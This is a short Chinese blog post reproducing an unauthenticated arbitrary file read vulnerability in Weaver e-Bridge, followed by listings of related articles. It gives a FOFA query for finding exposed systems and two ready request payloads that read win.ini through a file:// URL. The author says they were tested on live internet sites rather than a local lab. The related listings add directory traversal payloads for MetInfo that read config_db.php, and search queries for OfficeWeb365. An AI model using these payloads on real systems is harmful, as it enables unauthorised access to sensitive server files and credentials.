泛微e-Bridge未授权文件读取漏洞复现

10月前作者：Ling-cheng 分类：Toy博客阅读(37) 违法举报

这篇具有很好参考价值的文章主要介绍了泛微e-Bridge未授权文件读取漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

简介

泛微云桥 e-Bridge 存在未经授权读取任意文件漏洞，可利用该漏洞，实现任意文件读取，获取敏感信息。

fofa

title="泛微云桥e-Bridge"

漏洞复现

因为不是在本地搭建的漏洞复现环境，利用空间搜索引擎只找到很少量存在漏洞的网站，大多数都开启了身份验证，找到的也都是基于Windows的，所以就不在介绍Linux上搭建的了。

payload1

/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C://windows/win.ini&fileExt=txt

直接在url地址后添加

泛微e-Bridge未授权文件读取漏洞复现

之后复制返回的值进行访问

payload2

/file/fileNoLogin/id值文章来源地址https://www.toymoban.com/news/detail-494638.html

到了这里，关于泛微e-Bridge未授权文件读取漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

任意文件读取和漏洞复现

一些网站的需求，可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过，就可以查看或下载任意文件。这些文件可以是漂代码文件，配置文件，敏感文件等等。任意文件读取会造成（敏感）信息泄露：任意文件读取大多数情况是由于其他

2024年02月09日
浏览(44)
【漏洞复现】OfficeWeb365 Indexs 任意文件读取漏洞

OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特的加密方式对payload进行加密，读取任意文件，获取服务器敏感信息，使系统处于极不安全的状态。 FOFA：body=\\\"请输入furl参数\\\" || header=\\\"OfficeWeb365\\\" || banner=\\\"OfficeWeb365\\\" 读取文件加密方式

2024年02月02日
浏览(48)
漏洞复现-Yearning front 任意文件读取漏洞（附漏洞检测脚本）

文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，切勿当真，未授权的攻击属于非法行为！文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担

2024年01月18日
浏览(41)
Jenkins CLI 任意文件读取漏洞复现

Jenkins CLI 是 Jenkins 内置的命令行页面。 Jenkins 受影响版本中使用 args4j 库解析CLI命令参数，该库默认将参数中 @ 字符后的文件路径替换为文件内容，未授权的攻击者可利用该特性使用 Jenkins 控制器进程的默认字符编码读取 Jenkins 控制器文件系统上的任意文件(如加密密钥的二进

2024年02月22日
浏览(53)
OfficeWeb365 Indexs 任意文件读取漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。 OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特

2024年02月03日
浏览(40)
Metinfo6.0.0任意文件读取漏洞复现

漏洞原理在MetInfo6.0.0appsystemincludemodule的old_thumb.class.php文件可以看到这里对./进行了严格的过滤，但是却忽略了在Windows下还可以用…来跳转目录环境搭建下载Metinfo6.0.0 配置随便写，自己记住就行这里前面已经审计过代码了，就直接上payload了 http://10.9.75.161/MetInfo6.0.0

2024年02月10日
浏览(34)
Metinfo6.0.0任意文件读取【漏洞复现】

1.1、漏洞描述漏洞名称：MetInfo任意文件读取漏洞简介：MetInfo是一套使用PHP和MySQL开发的内容管理系统，其中的 /app/system/include/module/old_thumb.class.php 文件存在任意文件读取漏洞，攻击者可利用该漏洞读取网站的敏感文件。下载地址：历史版本安装文件下载 Ver_6.0.0 1.2、漏洞等

2024年02月10日
浏览(45)
metinfo_6.0.0 任意文件读取漏洞复现

漏洞点为/include/thumb.php 一测： /include/thumb.php?dir=..././http/..././config/config_db.php 二测： /include/thumb.php?dir=.....///http/.....///config/config_db.php 三测： /include/thumb.php?dir=http/.....///.....///config/config_db.php 四测： /include/thumb.php?dir=http....configconfig_db.php 注意：此POC 仅适用于Windows 系统

2024年01月20日
浏览(49)
用友NC word.docx 任意文件读取漏洞复现

用友NC是一款企业级ERP软件。作为一种信息化管理工具，用友NC提供了一系列业务管理模块，包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等，帮助企业实现数字化转型和高效管理。用友NC 系统word.docx等接口存在任意文件读取漏洞，未经身份认证

2024年01月25日
浏览(33)
officeWeb365 Indexs接口存在任意文件读取漏洞复现

OfficeWeb365 是专注于 Office 文档在线预览及PDF文档在线预览云服务，包括 Microsoft Word 文档在线预览、Excel 表格在线预览、Powerpoint 演示文档在线预览，WPS 文字处理、WPS 表格、WPS 演示及 Adobe PDF 文档在线预览。OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞，攻击者可通过独特

2024年02月20日
浏览(42)